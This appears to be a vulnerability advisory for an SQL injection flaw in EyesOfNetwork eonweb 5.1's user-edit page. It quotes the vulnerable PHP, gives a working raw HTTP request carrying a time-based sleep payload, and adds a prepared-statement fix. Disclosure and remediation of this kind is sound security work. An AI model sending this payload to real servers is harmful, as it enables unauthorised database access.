module_admin_user_add_modify_user.php

powered by minhaizhao from Anyuntec

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

/srv/eyesofnetwork/eonweb-5.1/module/admin_user/add_modify_user.php Line 114

if (($user_name != "") && ($user_name != null) && ($user_id != null) && ($user_id != "") && ($user_exist == 0)) {
    if (($user_password1 != "") && ($user_password1 != null) && ($user_password1 == $user_password2)) {

        $eonweb_groupname=mysqli_result(sqlrequest("$database_eonweb","SELECT group_name FROM groups WHERE group_id='$user_group'"),0,"group_name");
        $eonweb_oldgroupname=mysqli_result(sqlrequest("$database_eonweb","SELECT group_name FROM groups WHERE group_id='$old_group_id'"),0,"group_name");
        if ($user_password1 != "abcdefghijklmnopqrstuvwxyz") {
            $passwd_temp = md5($user_password1);
            // Update into eonweb
            // $user_name from the POST body is concatenated directly into the SQL string below
            sqlrequest("$database_eonweb","UPDATE users set user_name='$user_name', user_descr='$user_descr',group_id='$user_group',user_passwd='$passwd_temp',user_type='$user_type',user_location='$user_location',user_limitation='$user_limitation',user_language='$user_language' WHERE user_id ='$user_id'");
        }
        else {
            // Update into eonweb

$user_name is placed into this UPDATE statement without any filtering or escaping, so the value taken from the request becomes part of the SQL text and can be used for SQL injection.

/srv/eyesofnetwork/eonweb-5.1/module/admin_user/add_modify_user.php Line 300

if (isset($_POST['update'])){
    update_user($user_id, stripAccents($user_name), $user_descr, $user_group, $user_password1, $user_password2, $user_type, $user_location, $user_mail, $user_limitation, $old_group_id, $old_name, $create_user_in_nagvis, $create_user_in_cacti, $nagvis_role_id, $user_language);
}

EXP:

POST /module/admin_user/add_modify_user.php HTTP/1.1
Host: 192.168.91.66
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
Referer: https://192.168.91.66/module/admin_user/add_modify_user.php?user_id=1
Cookie: session_id=654387568; user_name=admin; user_id=1; user_limitation=0; group_id=1
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

user_id=1&user_name=admin%27+and+sleep%2810%29+%23&user_name_old=admin&user_type=0&user_group=1&create_user_in_nagvis=yes&nagvis_group=1&user_mail=&user_descr=default+user&user_password1=abcdefghijklmnopqrstuvwxyz&user_password2=abcdefghijklmnopqrstuvwxyz&user_language=0&update=update

The response is delayed for 10 seconds, which shows that the injected sleep(10) was executed by the database.
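A hardened form of the same UPDATE, added here as an example and not taken from eonweb: the columns are the ones from the vulnerable excerpt, but the query is a mysqli prepared statement so every request field is bound as data rather than spliced into the SQL text. The function name, the column whitelist and the use of null in place of the "abcdefghijklmnopqrstuvwxyz" sentinel are assumptions of this example; it expects an open mysqli connection in $db.

```php
<?php
declare(strict_types=1);

// Hypothetical replacement for the UPDATE in add_modify_user.php (added example,
// not eonweb's own code). Every value is bound as a parameter, so a user_name
// such as "admin' and sleep(10) #" is stored literally instead of parsed as SQL.
function update_user_safe(mysqli $db, int $user_id, array $fields, ?string $password): bool
{
    // Column names come from the vulnerable excerpt. Only whitelisted names are
    // ever placed in the SQL text; the values are always bound below.
    $allowed = ['user_name', 'user_descr', 'group_id', 'user_type',
                'user_location', 'user_limitation', 'user_language'];
    $set = [];
    $values = [];
    foreach ($allowed as $col) {
        if (array_key_exists($col, $fields)) {
            $set[] = "$col=?";
            $values[] = (string) $fields[$col];
        }
    }
    // Same rule as the original branch: a null password leaves user_passwd untouched.
    // md5 is kept only because that is what the existing users table stores; it is
    // not a suitable password hash.
    if ($password !== null) {
        $set[] = 'user_passwd=?';
        $values[] = md5($password);
    }
    if ($set === []) {
        return false; // nothing to update
    }
    $values[] = $user_id;
    $sql = 'UPDATE users SET ' . implode(', ', $set) . ' WHERE user_id=?';
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    // All fields are bound as strings, the trailing user_id as an integer.
    $types = str_repeat('s', count($values) - 1) . 'i';
    $stmt->bind_param($types, ...$values);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Usage mirroring the request body from the EXP section (connection details are
// placeholders): the payload is saved as an ordinary string and no SLEEP() runs.
// $db = new mysqli('localhost', 'eonweb', 'PLACEHOLDER', 'eonweb');
// update_user_safe($db, 1, ['user_name' => "admin' and sleep(10) #",
//                           'user_descr' => 'default user', 'group_id' => '1'], null);
```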